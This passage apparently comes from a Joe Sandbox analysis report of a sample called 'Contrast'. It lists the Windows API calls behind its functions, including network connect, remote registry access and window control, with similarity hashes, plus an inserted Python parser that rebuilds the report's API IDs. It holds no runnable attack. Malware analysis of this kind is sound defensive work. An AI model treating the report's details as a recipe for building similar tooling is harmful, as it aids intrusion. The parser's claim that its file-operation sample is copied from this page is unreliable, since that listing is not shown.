• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
• Instruction ID: 1fef433127720985dea57103d2b2ba0cb8e56e4419308e43dbef06a87ffcde1d
• Opcode Fuzzy Hash: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
• Instruction Fuzzy Hash: D9313C7191011ABFDF148BA0DC89AFEBBBCFF09340F000169E502A2180EB709E499AA4
APIs
• SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00596911
• GetWindowLongW.USER32(00FE5C40,000000F0), ref: 00596944
• GetWindowLongW.USER32(00FE5C40,000000F0), ref: 00596979
• SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 005969AB
• SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 005969D5
• GetWindowLongW.USER32(?,000000F0), ref: 005969E6
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00596A00
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: c9edf45b78dd7dbc7811c9e4034c8506f122d9fb9085c01870e79b3f0e5157eb
• Instruction ID: 82caa3ad954701d2502a06f77f8d60a1570d1cc19810dceed5d4cd0301e13ef6
• Opcode Fuzzy Hash: c9edf45b78dd7dbc7811c9e4034c8506f122d9fb9085c01870e79b3f0e5157eb
• Instruction Fuzzy Hash: 41311230604155AFDF21CF18DD88F653BE1FB9A754F1811A5F9148B2B2CB72AC48EB50
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E2CA
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E2F0
• SysAllocString.OLEAUT32(00000000), ref: 0056E2F3
• SysAllocString.OLEAUT32(?), ref: 0056E311
• SysFreeString.OLEAUT32(?), ref: 0056E31A
• StringFromGUID2.OLE32(?,?,00000028), ref: 0056E33F
• SysAllocString.OLEAUT32(?), ref: 0056E34D
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 2f5f27ac3742ca73b60378bcca8576f76b8e033ed1573e14b25da54cf98568e7
• Instruction ID: 67397d94a65cf993951577f62f9e3d5757c6727744c5c5db5684d829d1f88a62
• Opcode Fuzzy Hash: 2f5f27ac3742ca73b60378bcca8576f76b8e033ed1573e14b25da54cf98568e7
• Instruction Fuzzy Hash: 6E21927A605219AF9F10DFA8DC89CBF7BACFB09360B048525FA14DB290D670AC459760
APIs
  • Part of subcall function 00588475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005868B1
• WSAGetLastError.WSOCK32(00000000), ref: 005868C0
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005868F9
• connect.WSOCK32(00000000,?,00000010), ref: 00586902
• WSAGetLastError.WSOCK32 ref: 0058690C
• closesocket.WSOCK32(00000000), ref: 00586935
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0058694E
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 910771015-0
• Opcode ID: afbb462ab739f85d38b906ccb3cb484db704114f5a73d4772c1cfdf1f52f83a8
• Instruction ID: 7847d08e3d8ed62c4b1201e2f9cdd699f3e29e24e3149c3a817e7282793ed756
• Opcode Fuzzy Hash: afbb462ab739f85d38b906ccb3cb484db704114f5a73d4772c1cfdf1f52f83a8
• Instruction Fuzzy Hash: F031B371600109AFDF10AF64DC89BBE7BA9FB45725F044029FD09AB2D1DB74AC449FA1
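The "API ID" printed under each Similarity entry can be regenerated from the APIs listing that precedes it. The Python below is an added example, not part of the Joe Sandbox report or of its IDA plugin: it parses call lines in the exact shape printed on this page (bullet, optional "Part of subcall function" prefix, API.MODULE(args), ref: address) and rebuilds the ID by a rule inferred from the six listings above, namely drop a trailing A/W suffix, keep lowercase CRT and Winsock names whole, split Windows names on CamelCase, discard tokens of three or fewer characters, all-caps tokens (WSA, GUID) and digits, count tokens over all calls including subcall entries, group by count descending, ASCII-sort within a group and join groups with "$". That rule is an inference from this page's data, not Joe Sandbox's documented algorithm; the two sample blocks are copied from the listings above, and the String ID / API String ID hashes are not reproduced.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and rebuild the
"API ID" shown under "Similarity" (tokenisation rule inferred from this page's data)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One listed call:  "• MoveFileW.KERNEL32(?,?), ref: 00573BDE"  or
# "• Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(...), ref: 00574BE0"
CALL_RE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# CamelCase splitter: WSAGetLastError -> WSA Get Last Error; StringFromGUID2 -> String From GUID 2
CAMEL_RE = re.compile(r"[A-Z]+(?=[A-Z][a-z])|[A-Z]?[a-z]+|[A-Z]+|\d+")


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: tuple                 # raw argument cells; "?" means the sandbox could not resolve it
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # callee that performs this call indirectly, if any


def parse_calls(text: str) -> List[Call]:
    """Extract the call lines of one APIs block; headings and hash lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def api_tokens(api: str) -> List[str]:
    """Inferred tokenisation: drop the A/W suffix, keep lowercase CRT/Winsock names whole,
    split CamelCase, drop tokens of <= 3 chars, all-caps tokens (WSA, GUID) and digits."""
    name = api[:-1] if len(api) > 1 and api[-1] in "AW" and api[-2].islower() else api
    if not any(c.isupper() for c in name):
        return [name]
    return [t for t in CAMEL_RE.findall(name)
            if len(t) > 3 and t.isalpha() and not t.isupper()]


def api_id(calls: List[Call]) -> str:
    """Count tokens over all calls (subcall entries included), group by count descending,
    ASCII-sort inside each group and join the groups with '$'."""
    counts = Counter(t for c in calls for t in api_tokens(c.api))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Sample input: two APIs blocks copied verbatim from the listings on this page.
FILE_BLOCK = """APIs
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573B8A,?), ref: 00574BE0
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573B8A,?), ref: 00574BF9
• lstrcmpiW.KERNEL32(?,?), ref: 00573BAA
• _wcscmp.LIBCMT ref: 00573BC6
• MoveFileW.KERNEL32(?,?), ref: 00573BDE
• _wcscat.LIBCMT ref: 00573C26
• SHFileOperationW.SHELL32(?), ref: 00573C92
Strings"""

SOCKET_BLOCK = """APIs
  • Part of subcall function 00588475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005884A0
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005868B1
• WSAGetLastError.WSOCK32(00000000), ref: 005868C0
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005868F9
• connect.WSOCK32(00000000,?,00000010), ref: 00586902
• WSAGetLastError.WSOCK32 ref: 0058690C
• closesocket.WSOCK32(00000000), ref: 00586935
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0058694E"""

if __name__ == "__main__":
    for name, block in (("file", FILE_BLOCK), ("socket", SOCKET_BLOCK)):
        calls = parse_calls(block)
        print(name, len(calls), "calls ->", api_id(calls))
```

Run stand-alone it prints the two IDs exactly as they appear on this page. Because the ID is a count-ordered bag of name fragments rather than a call sequence, it groups functions by API mix regardless of call order, which is what makes it usable for matching a function across samples; it is also why the second MultiByteToWideChar/SysAllocString listing below, whose Similarity entry is cut off on this page, would receive the same ID under this rule. When reading the socket listing itself, 8004667E is FIONBIO, so the sequence socket, ioctlsocket, connect, WSAGetLastError, closesocket, ioctlsocket is the usual non-blocking connect with a timeout, with blocking mode restored afterwards.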
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E3A5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E3CB
• SysAllocString.OLEAUT32(00000000), ref: 0056E3CE
• SysAllocString.OLEAUT32 ref: 0056E3EF
• SysFreeString.OLEAUT32 ref: 0056E3F8
• StringFromGUID2.OLE32(?,?,00000028), ref: 0056E412
• SysAllocString.OLEAUT32(?), ref: 0056E420
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
  • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
  • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597C57
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00597C64
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00597C6F
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597C7E
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597C8A
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• __init_pointers.LIBCMT ref: 00539D16
  • Part of subcall function 005333B7: EncodePointer.KERNEL32(00000000), ref: 005333BA
  • Part of subcall function 005333B7: __initp_misc_winsig.LIBCMT ref: 005333D5
  • Part of subcall function 005333B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0053A0D0
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0053A0E4
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0053A0F7
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0053A10A
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0053A11D
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0053A130
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0053A143
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0053A156
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0053A169
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0053A17C
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0053A18F
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0053A1A2
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0053A1B5
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0053A1C8
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0053A1DB
  • Part of subcall function 005333B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0053A1EE
• __mtinitlocks.LIBCMT ref: 00539D1B
• __mtterm.LIBCMT ref: 00539D24
  • Part of subcall function 00539D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539D29,00537EFD,005CCD38,00000014), ref: 00539E86
  • Part of subcall function 00539D8C: _free.LIBCMT ref: 00539E8D
  • Part of subcall function 00539D8C: DeleteCriticalSection.KERNEL32(0R],?,?,00539D29,00537EFD,005CCD38,00000014), ref: 00539EAF
• __calloc_crt.LIBCMT ref: 00539D49
• __initptd.LIBCMT ref: 00539D6B
• GetCurrentThreadId.KERNEL32 ref: 00539D72
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00534282,?), ref: 005341D3
• GetProcAddress.KERNEL32(00000000), ref: 005341DA
• EncodePointer.KERNEL32(00000000), ref: 005341E6
• DecodePointer.KERNEL32(00000001,00534282,?), ref: 00534203
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoInitialize$combase.dll
• API String ID: 3489934621-340411864
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005341A8), ref: 005342A8
• GetProcAddress.KERNEL32(00000000), ref: 005342AF
• EncodePointer.KERNEL32(00000000), ref: 005342BA
• DecodePointer.KERNEL32(005341A8), ref: 005342D5
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
APIs
• GetClientRect.USER32(?,?), ref: 005121B8
• GetWindowRect.USER32(?,?), ref: 005121F9
• ScreenToClient.USER32(?,?), ref: 00512221
• GetClientRect.USER32(?,?), ref: 00512350
• GetWindowRect.USER32(?,?), ref: 00512369
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1296646539-0
                                                                                                                                        • Opcode ID: 0fd93d7714a226e611edb7b112aebaf34e5ba781397c5cfa45ffcd9e6870c689
                                                                                                                                        • Instruction ID: dd3b379e199b7620f0150ecf03d2e18782c338c91c6d8ee6c71c79668d650b72
                                                                                                                                        • Opcode Fuzzy Hash: 0fd93d7714a226e611edb7b112aebaf34e5ba781397c5cfa45ffcd9e6870c689
                                                                                                                                        • Instruction Fuzzy Hash: BBB19139900249DBEF10CFA8C4807EDBBB1FF48314F149529ED69EB255DB34AAA0DB54
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$__itow__swprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3253778849-0
                                                                                                                                        • Opcode ID: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                        • Instruction ID: 9c9b6ab5bbdf1a3174de98157e13ed43c35168480921802d90b5517401e396c6
                                                                                                                                        • Opcode Fuzzy Hash: d64454222c26cb8bf762489de01ddacca6189937e32c11841e75ba2062f97503
                                                                                                                                        • Instruction Fuzzy Hash: 9F61AE30500A9BABDF15EF60D889EFE3BA8BF85304F048559F8595B292DB309D45DB50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                                                                                                                                          • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059091D
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059095D
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590980
                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005909A9
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005909EC
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 005909F9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4046560759-0
                                                                                                                                        • Opcode ID: 0009d26dfd99588da360e3f583ae02c46a47943077daf6815f7c12c6b677eb8e
                                                                                                                                        • Instruction ID: f90d150414e23acfe3e3f776d7d172d346b3ad494f5e527b9f604c7f67271c3d
                                                                                                                                        • Opcode Fuzzy Hash: 0009d26dfd99588da360e3f583ae02c46a47943077daf6815f7c12c6b677eb8e
                                                                                                                                        • Instruction Fuzzy Hash: 2A515A311082059FDB14EF64C889E6BBFE9FF89314F04491DF595872A2DB31E945CB92
                                                                                                                                        APIs
                                                                                                                                        • GetMenu.USER32(?), ref: 00595E38
                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00595E6F
                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00595E97
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00595F06
                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 00595F14
                                                                                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595F65
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 650687236-0
                                                                                                                                        • Opcode ID: 8c5585791109cfe99bb324a4208f8754dc46d0fcf769a6faca8206a4aeea6562
                                                                                                                                        • Instruction ID: 1cac44abcf6a8269cd6cf941ee3e1ebcfda21c3df2afe22a955ecedc0bb16c1f
                                                                                                                                        • Opcode Fuzzy Hash: 8c5585791109cfe99bb324a4208f8754dc46d0fcf769a6faca8206a4aeea6562
                                                                                                                                        • Instruction Fuzzy Hash: BA51A175A01616AFCF12EF64C8459AEBBB5FF48320F104499F905BB391DB30AE418F90
                                                                                                                                        APIs
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0056F6A2
                                                                                                                                        • VariantClear.OLEAUT32(00000013), ref: 0056F714
                                                                                                                                        • VariantClear.OLEAUT32(00000000), ref: 0056F76F
                                                                                                                                        • _memmove.LIBCMT ref: 0056F799
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0056F7E6
                                                                                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F814
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1101466143-0
                                                                                                                                        • Opcode ID: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                                                                                                                                        • Instruction ID: cbbfb5300db800de1d4b7a261ad9673e6c4bcf5efe709d763863248e57776a46
                                                                                                                                        • Opcode Fuzzy Hash: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                                                                                                                                        • Instruction Fuzzy Hash: 85516BB5A00209EFCB14CF58D884AAABBB8FF4C314B15856AED59DB340D730E951CFA0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 005729FF
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00572A4A
                                                                                                                                        • IsMenu.USER32(00000000), ref: 00572A6A
                                                                                                                                        • CreatePopupMenu.USER32 ref: 00572A9E
                                                                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00572AFC
                                                                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572B2D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                        • Opcode ID: e6ff64637f8a6e8f690530fd02a2915cade09299512e1803e4e4eb621676af40
                                                                                                                                        • Instruction ID: 7e6c2438efbb79763e80fdb39920615697b13d05742311dad4f0b4384a972f54
                                                                                                                                        • Opcode Fuzzy Hash: e6ff64637f8a6e8f690530fd02a2915cade09299512e1803e4e4eb621676af40
                                                                                                                                        • Instruction Fuzzy Hash: FB51BE70A0020ADFCF25CF68E888AAEBFF4BF55314F148559E81D9B2A1D7B09944EB51
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00511B76
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00511BDA
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00511BF7
                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00511C08
                                                                                                                                        • EndPaint.USER32(?,?), ref: 00511C52
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                         • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                         • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                        • Opcode ID: aba62ecc3e5dd5e75f4f6766b208877f6d8459a3a134c1d3a1cefbed7b2630fd
